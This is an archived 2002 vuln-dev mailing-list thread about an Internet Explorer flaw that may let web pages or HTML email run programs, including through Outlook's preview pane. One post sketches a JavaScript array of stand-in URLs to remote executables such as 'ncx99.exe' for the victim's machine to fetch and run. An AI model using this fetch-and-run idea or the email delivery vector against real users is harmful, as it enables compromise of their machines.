RE: Rather large MSIE-hole

From: Chad Thunberg (chadth@nologin.org)
Date: 03/15/02 

From: "Chad Thunberg" <chadth@nologin.org>
To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>
Date: Thu, 14 Mar 2002 22:35:58 -0800

This is not limited to a user visiting a webpage. Outlook and Outlook
express execute client side code in email per the IE settings assigned. A
user doesn't even have to open the html formatted email with the js or this
xml code embedded if they are using a preview pain. Also, if you look at
the codebase and the functions surrounding it, you will realize that passing
additional parameters separated by any type of space will not work.
However, using this in conjunction with other methods and transports can be
very powerful.

-Chad

-----Original Message-----
From: KF [mailto:dotslash@snosoft.com]
Sent: Thursday, March 14, 2002 2:48 PM
To: vuln-dev@security-focus.com
Subject: Re: Rather large MSIE-hole

Another thought... will this bug run an executable from a web page? If
so you could just make your own binary to do whatever you wanted. Like
http://mysiteathome.com/malware.exe or something along those lines. I
would HOPE that it asks to save the file to disk or even better ignore
it all together. Maybe try something like:

var programName=new Array(
    'http://mysiteathome.com/ncx99.exe',
    'http://someothersite.com/ncx99.exe',
);

I would do this myself but I don't have any windows boxen to test.
-KF

Paul D. Campbell wrote:

>>Could you not create a batch file that housed the commands you wanted
>>to run
>>(with args) and just run the batch file?
>>I apologise if someone has already addressed this.
>>
>>-Eric
>>
>
>You would probably be able to do this. However, you would first need
>to place the batch file on the target machine. Then you would have to
>sit around and hope the user visits your malicious site. Though, if
>you have the capability to write to someone's harddrive you could do
>something much nastier than this :)
>
>Paul
>
>

Relevant Pages

  • Re: DST update for Exchange 2003 and Outlook 2003
    ... it named the batch file MSEXTMZ_1.BAT; ... Office\Office12\Office Outlook Time Zone Data Update Tool\tzmove.exe. ... MsExTmzCfg will create a subfolder named for your Exchange Server, ... "If you want to try it out on only a few mailboxes at first, ...
    (microsoft.public.exchange.admin)
  • Re: Software Rollout
    ... I edit that batch file all the time to map domain ... wide drive letters to shares on the server. ... it installed outlook. ... If something did not install then just do the ...
    (microsoft.public.windows.server.sbs)
  • Re: How to prevent task scheduler from starting a program already running
    ... OP to save the batch file as "Outlook.bat". ... Back in task scheduler, click the browse button and locate the ... (because outlook is already running). ... I have setup Task Scheduler to start Microsoft Outlook to run at 7 AM ...
    (microsoft.public.windowsxp.general)
  • Re: How to prevent task scheduler from starting a program already running
    ... The batch file you posted does exactly what it's supposed ... If Outlook is not active then it will start Outlook. ... @echo off ... Back in task scheduler, click the browse button and locate the ...
    (microsoft.public.windowsxp.general)